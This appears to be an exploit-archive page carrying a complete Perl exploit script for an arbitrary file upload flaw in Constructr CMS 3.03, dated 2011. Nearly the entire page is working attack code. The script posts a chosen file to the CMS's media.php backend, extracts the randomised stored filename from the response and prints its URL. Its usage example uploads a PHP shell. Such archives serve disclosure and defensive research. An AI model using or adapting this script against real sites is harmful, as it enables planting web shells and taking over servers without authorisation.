ExploitFixes
Constructr CMS 3.03 Arbitrary File Upload 2011-03-23 10:15:12

#!/usr/bin/env perl

# Constructr CMS 3.03 Arbitrary File Upload
#
# Author: plucky
# Email: [email protected]
#
# Vulnerable Page: /constructr/backend/media.php [line
# App Download: http://sourceforge.net/projects/constructr/
#
# Date: 23/03/2011
# THX TO: yawn, shrod, h473 and DoMinO

use strict;
use warnings;

use LWP::UserAgent;
use HTTP::Request::Common qw( POST );


my $host = '';
my $file_to_upload = '';
my $new_file_name = '';
my $file_extension = '';


sub exploit_usage {

print 'Constructr CMS 3.03 Arbitrary File Upload' . "\n".
'-------------------------' . "\n".
'Author: plucky' . "\n".
'Email: [email protected]' . "\n".
'-------------------------' . "\n".
'Usage:' . "\n".
' perl xpl.pl [host]/[cms-path]/ /[path-file]/[file]' . "\n".
'Example:' . "\n".
' perl ' . $0 . ' http://vulnerable.com/constructr/ /home/plucky/shell.php' . "\n";

exit;

}

sub file_parse {

my $file_name = '';
my $file_extension = '';
my $file_to_upload = '';
my $rfile_to_upload = '';


$rfile_to_upload = shift;
$file_to_upload = ${$rfile_to_upload};

$file_to_upload =~ m/\/([a-z0-9]+)\.([a-z]+)/i;

$file_name = $1;
$file_extension = $2;

return ( $file_name, $file_extension )

}

sub upload_file {

my $host = '';
my $rhost = '';
my $file_name = '';
my $file_extension = '';
my $response = '';
my $path = '';
my $html = '';
my $user_agent = '';
my $file_to_upload = '';
my $rfile_to_upload = '';
my $new_file_name = '';


( $rhost, $rfile_to_upload ) = @_;

$host = ${$rhost};
$file_to_upload = ${$rfile_to_upload};

$user_agent = LWP::UserAgent->new;
$path = $host . 'backend/media.php';


$response = $user_agent->post(
$path,
[
'create_file' => 'try',
'file' => [$file_to_upload],
],
'Content_Type' => 'form-data'
);


( $file_name, $file_extension ) = file_parse( \$file_to_upload );


$html = $response->decoded_content;
$html =~ m/show_path=([a-f0-9]{32})\.$file_extension">$file_name\.$file_extension<\/a>/i;

$new_file_name = $1;

return ( $new_file_name, $file_extension );

}

@ARGV == 2
? ( $host, $file_to_upload ) = @ARGV
: exploit_usage();

( $new_file_name, $file_extension ) = upload_file( \$host, \$file_to_upload );


print $host, 'data/workspace/uploads/', $new_file_name, '.', $file_extension, "\n";